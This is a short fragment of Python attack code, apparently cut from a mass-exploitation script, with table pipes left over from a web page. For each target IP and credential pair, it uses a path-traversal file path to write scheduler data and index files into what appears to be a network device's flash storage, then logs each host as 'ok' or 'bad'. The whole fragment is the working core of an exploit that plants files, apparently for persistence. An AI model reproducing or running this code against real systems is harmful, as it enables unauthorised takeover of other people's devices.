fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False) | |
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True) | |
if fg1 and fg2: | |
fg = True | |
break | |
if fg: | |
log(ip + ' - ok') | |
else: | |
log(ip + ' - bad') |